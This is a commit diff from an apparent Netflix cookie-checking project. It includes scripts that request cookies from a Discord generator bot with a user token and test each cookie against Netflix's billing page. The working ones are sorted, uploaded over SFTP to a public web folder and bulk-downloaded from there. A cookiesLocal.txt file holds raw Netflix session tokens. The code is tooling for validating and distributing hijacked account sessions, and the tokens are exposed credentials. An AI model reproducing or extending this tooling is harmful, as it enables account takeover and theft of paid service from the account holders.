Hashir Kashif commited on
Commit
4f424b2
·
1 Parent(s): ac3cc4b

asdasdasdasdas

Browse files
Files changed (5) hide show
  1. app.py +3 -3
  2. cookieFix.py +1 -1
  3. cookie_checker.py +122 -0
  4. cookiesLocal.txt +1 -0
  5. extract_all_membership.py +44 -0
app.py CHANGED
@@ -39,7 +39,7 @@ def send_retrieve_cookie_msg(channelid):
39
  data = {"content": "c.gen netflix"}
40
  headers = {"authorization": secret}
41
  r = requests.post(
42
- "https://discord.com/api/v9/channels/1186365728278990938/messages",
43
  data=data,
44
  headers=headers)
45
  time.sleep(10)
@@ -155,7 +155,7 @@ def getNetflixInfo(cookiefile):
155
  fixCookie(newCookieFile)
156
  ftp,ssh_client = sftp_connect()
157
  files = ftp.put(newCookieFile,"./domains/hashir672.serv00.net/public_html/Membership/"+cookieFileName)
158
-
159
  print("uploaded ",files)
160
  # print('connection established successfully')
161
 
@@ -179,7 +179,7 @@ def getNetflixInfo(cookiefile):
179
 
180
  def mainTask():
181
  print("running cookie retriever")
182
- send_retrieve_cookie_msg(1191381755731644418)
183
  time.sleep(5)
184
  print("running netflix checker")
185
  os.chdir('./cookies/')
 
39
  data = {"content": "c.gen netflix"}
40
  headers = {"authorization": secret}
41
  r = requests.post(
42
+ "https://discord.com/api/v9/channels/1202341653961257031/messages",
43
  data=data,
44
  headers=headers)
45
  time.sleep(10)
 
155
  fixCookie(newCookieFile)
156
  ftp,ssh_client = sftp_connect()
157
  files = ftp.put(newCookieFile,"./domains/hashir672.serv00.net/public_html/Membership/"+cookieFileName)
158
+
159
  print("uploaded ",files)
160
  # print('connection established successfully')
161
 
 
179
 
180
  def mainTask():
181
  print("running cookie retriever")
182
+ send_retrieve_cookie_msg(1239589658309034055)
183
  time.sleep(5)
184
  print("running netflix checker")
185
  os.chdir('./cookies/')
cookieFix.py CHANGED
@@ -6,7 +6,7 @@ def fixCookie(cookiefile):
6
  break
7
  print(line.replace("\n",""))
8
 
9
-
10
 
11
  # cookies=[]
12
 
 
6
  break
7
  print(line.replace("\n",""))
8
 
9
+ fixCookie("./cookiesLocal.txt")
10
 
11
  # cookies=[]
12
 
cookie_checker.py ADDED
@@ -0,0 +1,122 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import re
2
+ import requests
3
+ from bs4 import BeautifulSoup
4
+ from deep_translator import GoogleTranslator
5
+ import glob
6
+ import os
7
+ import shutil
8
+ import string
9
+ import random
10
+ import sys
11
+ import time
12
+ import json
13
+
14
+ loginPageCount = 0
15
+ membershipCount = 0
16
+ noMembershipCount = 0
17
+ def parseCookieFile(cookiefile):
18
+ x = ""
19
+ """Parse a cookies.txt file and return a dictionary of key value pairs
20
+ compatible with requests."""
21
+
22
+ cookies = {}
23
+ with open(cookiefile, 'r') as fp:
24
+ for line in fp:
25
+ if not re.match(r'^\#', line):
26
+ lineFields = line.strip().split('\t')
27
+ try:
28
+ cookies[lineFields[5]] = lineFields[6]
29
+
30
+ except:
31
+ # print("Invalid cookie")
32
+ pass
33
+
34
+ if x == "fail":
35
+ return "fail"
36
+ else:
37
+ return cookies
38
+
39
+
40
+ def getNetflixInfo(cookiefile):
41
+ global loginPageCount
42
+ global membershipCount
43
+ global noMembershipCount
44
+ cookies = parseCookieFile(cookiefile)
45
+ # print(cookies)
46
+ if cookies != "fail":
47
+
48
+ print("a")
49
+ r = requests.get("https://www.netflix.com/BillingActivity",
50
+ cookies=cookies)
51
+ print(r.url)
52
+ if "login" in r.url:
53
+ loginPageCount = loginPageCount+1
54
+ print("Login Page")
55
+ os.remove(cookiefile)
56
+ else:
57
+ soup = BeautifulSoup(r.content, "html.parser")
58
+ try:
59
+ billingDate = soup.find("div", {
60
+ "data-uia": "streaming-next-cycle"
61
+ }).get_text()
62
+
63
+ planName = soup.find("div", {"data-uia": "plan-name"}).get_text()
64
+
65
+ billingDate = GoogleTranslator(source='auto',
66
+ target='en').translate(billingDate)
67
+ try:
68
+ lang = soup.find("html", {"lang": 'en'}).get_text()
69
+ lang = "English"
70
+ except:
71
+ lang = ""
72
+ pass
73
+ planName = GoogleTranslator(source='auto',
74
+ target='en').translate(planName)
75
+
76
+ print(billingDate + " " + planName + " " + lang)
77
+ S = 3
78
+ ran = ''.join(
79
+ random.choices(string.ascii_uppercase + string.digits, k=S))
80
+ try:
81
+ os.makedirs("../Membership")
82
+ except:
83
+ pass
84
+ shutil.move(
85
+ cookiefile, "../Membership/" + billingDate + " " + planName + " " +
86
+ lang + " (" + str(ran) + ").txt")
87
+ membershipCount = membershipCount+1
88
+
89
+ except:
90
+ S = 10
91
+ ran = ''.join(
92
+ random.choices(string.ascii_uppercase + string.digits, k=S))
93
+ try:
94
+ os.makedirs("../NoMembership")
95
+ except:
96
+ pass
97
+ shutil.move(cookiefile, '../NoMembership/NoMember' + str(ran) + ".txt")
98
+ noMembershipCount=noMembershipCount+1
99
+ else:
100
+
101
+ os.remove(cookiefile)
102
+
103
+
104
+ n = 0
105
+ try:
106
+ os.chdir('./cookies')
107
+ except:
108
+ print("Cookies folder not found!\nThe name of cookie folder should me 'cookies'.\nClosing in 5 seconds...")
109
+ time.sleep(5)
110
+ sys.exit()
111
+ for fileName in glob.glob("*.txt"):
112
+ n += 1
113
+ # print(n)
114
+ # print(fileName)
115
+ getNetflixInfo(fileName)
116
+
117
+ if n==0:
118
+ print("Cookie folder is empty")
119
+ os.chdir('../')
120
+
121
+
122
+ print("========================\nInvalid cookies: "+str(loginPageCount)+"\nMembership Cookies: "+str(membershipCount)+"\nValid cookies (no membership): "+str(noMembershipCount))
cookiesLocal.txt CHANGED
@@ -3,6 +3,7 @@
3
  .netflix.com TRUE / FALSE 1730077477 OptanonConsent isGpcEnabled=0&datestamp=Sun+Oct+29+2023+02%3A04%3A37+GMT%2B0100+(Mitteleurop%C3%A4ische+Normalzeit)&version=202301.1.0&isIABGlobal=false&hosts=&consentId=abd9331e-1568-44cd-8ce6-072c32644243&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0002%3A1%2CC0003%3A1%2CC0004%3A1&geolocation=DE%3BNI&AwaitingReconsent=false
4
  .netflix.com TRUE / FALSE 1733101477 dsca customer
5
  .netflix.com TRUE / FALSE 1730077477 nfvdid BQFmAAEBELH7oLMMcP4qNIw1f_9gpPZgFwmkdq5V-P-a1Hq1ZFqW60KFEHpUYb6xJjGt5ZBK_GFLa1W9rJaSLTd6GVhqKRmEWQFowHVUjMlVhx8Ebhdrv4yf266zxSi06G0wJyw3KzY-A8WdFbgjGtGc5g0Q4_Et
 
6
  .netflix.com TRUE / FALSE 1730143165 NetflixId ct%3DBQAOAAEBEFu9CsuEjjvziEwCyUANCn2B8IVAP2tWnbHE_b40ge9zNC4QTDk_kFWa2F4B72Xsz4UQjqb1indL4_N6vSa6CuGrMFT2GelG4OIW2wVJJBVbi8YWTQKMXL8edFhlIeFMuPvoqP0qlTnjHVI1hEogMJtJwZAds8qXYw7IxPL0pJc4RD6nxxezOOoHtP_TMWahGIhsPO_6Ojtx_31sTACOYKB1lnN0e0WYUHhFK5m8dXDO3X1VoOqxDRN5-94v13jK4TBkL35A9tFahDZX4mckoXrOAyDhMpl6IAh4dRhFtyDfiDHcBY-l-DSkX8P4Nhx6jFbKVJ7qRpT_nz7HNppBLq5BDbYc_1ufS79J1BChrcsLnLFrWZVKzOPs01GXLW24OMxpKfxsSZBcJP8oN405fA1UEIcTMix5pr-dsrPO-TrYJ5EllR-UAWEZQnMz8CGWG43EiXm67eI37jV59THe6xG4PorwNQK5KaeXlYktp9k8xh-SdZ3GG77KGyhV9JW6voK-VqxQvQn-DwQ8DDaVudy2wM2NKcYZ0F7zXxirJldvLe9rfxhPySxdqvTaI3AcNRlktC0rNG29CYrckDamyFB0lmvkIi1pa10kiCWhMKTr9qNR42XFluEgSaTmOyqTmsJs4UUIBziNqXTler37BSj2VJyEd0h0T5ck_BOCOuewm1A.%26bt%3Ddbl%26ch%3DAQEAEAABABRbxjyeE5FREGIwE5rtAlzHocxHFoqwwtE.%26v%3D2%26mac%3DAQEAEAABABR1CnxvONylg1xtOagmcZxKYMU6JjZBVts.
7
  .netflix.com TRUE / FALSE 1730143165 SecureNetflixId v%3D2%26mac%3DAQEAEQABABRNCFUUuYxsITZ_DxMYxMg5xmcRF3aEUOY.%26dt%3D1698607163380
8
  .netflix.com TRUE / FALSE 1706383166 hasSeenCookieDisclosure true
 
3
  .netflix.com TRUE / FALSE 1730077477 OptanonConsent isGpcEnabled=0&datestamp=Sun+Oct+29+2023+02%3A04%3A37+GMT%2B0100+(Mitteleurop%C3%A4ische+Normalzeit)&version=202301.1.0&isIABGlobal=false&hosts=&consentId=abd9331e-1568-44cd-8ce6-072c32644243&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0002%3A1%2CC0003%3A1%2CC0004%3A1&geolocation=DE%3BNI&AwaitingReconsent=false
4
  .netflix.com TRUE / FALSE 1733101477 dsca customer
5
  .netflix.com TRUE / FALSE 1730077477 nfvdid BQFmAAEBELH7oLMMcP4qNIw1f_9gpPZgFwmkdq5V-P-a1Hq1ZFqW60KFEHpUYb6xJjGt5ZBK_GFLa1W9rJaSLTd6GVhqKRmEWQFowHVUjMlVhx8Ebhdrv4yf266zxSi06G0wJyw3KzY-A8WdFbgjGtGc5g0Q4_Et
6
+ ==========
7
  .netflix.com TRUE / FALSE 1730143165 NetflixId ct%3DBQAOAAEBEFu9CsuEjjvziEwCyUANCn2B8IVAP2tWnbHE_b40ge9zNC4QTDk_kFWa2F4B72Xsz4UQjqb1indL4_N6vSa6CuGrMFT2GelG4OIW2wVJJBVbi8YWTQKMXL8edFhlIeFMuPvoqP0qlTnjHVI1hEogMJtJwZAds8qXYw7IxPL0pJc4RD6nxxezOOoHtP_TMWahGIhsPO_6Ojtx_31sTACOYKB1lnN0e0WYUHhFK5m8dXDO3X1VoOqxDRN5-94v13jK4TBkL35A9tFahDZX4mckoXrOAyDhMpl6IAh4dRhFtyDfiDHcBY-l-DSkX8P4Nhx6jFbKVJ7qRpT_nz7HNppBLq5BDbYc_1ufS79J1BChrcsLnLFrWZVKzOPs01GXLW24OMxpKfxsSZBcJP8oN405fA1UEIcTMix5pr-dsrPO-TrYJ5EllR-UAWEZQnMz8CGWG43EiXm67eI37jV59THe6xG4PorwNQK5KaeXlYktp9k8xh-SdZ3GG77KGyhV9JW6voK-VqxQvQn-DwQ8DDaVudy2wM2NKcYZ0F7zXxirJldvLe9rfxhPySxdqvTaI3AcNRlktC0rNG29CYrckDamyFB0lmvkIi1pa10kiCWhMKTr9qNR42XFluEgSaTmOyqTmsJs4UUIBziNqXTler37BSj2VJyEd0h0T5ck_BOCOuewm1A.%26bt%3Ddbl%26ch%3DAQEAEAABABRbxjyeE5FREGIwE5rtAlzHocxHFoqwwtE.%26v%3D2%26mac%3DAQEAEAABABR1CnxvONylg1xtOagmcZxKYMU6JjZBVts.
8
  .netflix.com TRUE / FALSE 1730143165 SecureNetflixId v%3D2%26mac%3DAQEAEQABABRNCFUUuYxsITZ_DxMYxMg5xmcRF3aEUOY.%26dt%3D1698607163380
9
  .netflix.com TRUE / FALSE 1706383166 hasSeenCookieDisclosure true
extract_all_membership.py ADDED
@@ -0,0 +1,44 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import requests
2
+ from bs4 import BeautifulSoup
3
+ from urllib.parse import urlparse
4
+ import os
5
+ import aiohttp
6
+ import asyncio
7
+ import time
8
+ start = time.perf_counter()
9
+ def get_urls():
10
+ url = 'https://hashir672.serv00.net/'
11
+ reqs = requests.get(url)
12
+ soup = BeautifulSoup(reqs.text, 'html.parser')
13
+
14
+ urls = []
15
+ for link in soup.find_all('a'):
16
+ file_link = link.get('href')
17
+ urls.append(url+file_link)
18
+
19
+ # r = requests.get(url+file_link, allow_redirects=True)
20
+ # open("./extract_member/" + str(file_name), 'wb').write(r.content)
21
+ # print(file_name)
22
+ return urls
23
+
24
+
25
+ urls = get_urls()
26
+
27
+
28
+ async def download_image(url):
29
+ # print(f"Downloading {url}")
30
+ async with aiohttp.ClientSession() as session:
31
+ async with session.get(url) as resp:
32
+ with open("./extract_member/"+url.split("/")[-1], 'wb') as f:
33
+ f.write(await resp.read())
34
+ # print(f"Done downloading {url}")
35
+
36
+ async def main():
37
+ await asyncio.gather(*[download_image(url) for url in urls])
38
+
39
+ asyncio.run(main())
40
+
41
+ print(f"Total time: {time.perf_counter() - start}")
42
+
43
+
44
+